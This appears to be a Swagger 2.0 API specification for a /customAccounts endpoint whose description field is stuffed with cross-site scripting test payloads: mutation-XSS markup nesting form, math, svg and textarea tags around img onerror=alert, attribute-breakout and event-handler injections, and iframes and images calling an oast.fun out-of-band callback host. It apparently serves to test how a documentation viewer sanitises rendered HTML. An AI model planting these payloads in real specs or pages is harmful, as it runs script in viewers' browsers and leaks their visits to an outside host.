swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    This is a test :) [link](https://www.google.com%0Aalert) <a href="http://example.com/" target="_self" onfocus=print()>example</a> ![image4](https://google.com/test.jpg"onmouseover="alert(1)) ![imagenew](https://www.collectingflags.com/bot.svg)<iframe src="https://wdmlfwehjkkbslnzvkyjczx1dchprmvw8.oast.fun" width=300px height=300px></iframe>
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
    <iframe src="https://wdmlfwehjkkbslnzvkyjczx1dchprmvw8.oast.fun"></iframe>
    <img src="https://wdmlfwehjkkbslnzvkyjczx1dchprmvw8.oast.fun"></img>
    Here are the tags:

    ```html
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
    <iframe></iframe>
    <img src=q></img>
    ```

    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
    <iframe></iframe>
    <img src=q></img>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
paths:
  /customAccounts:
    get:
      summary: "Retrieve Custom Accounts"
      description: "This endpoint retrieves custom accounts. This is a test with various HTML tags to check rendering."
      responses:
        200:
          description: "Successful response"
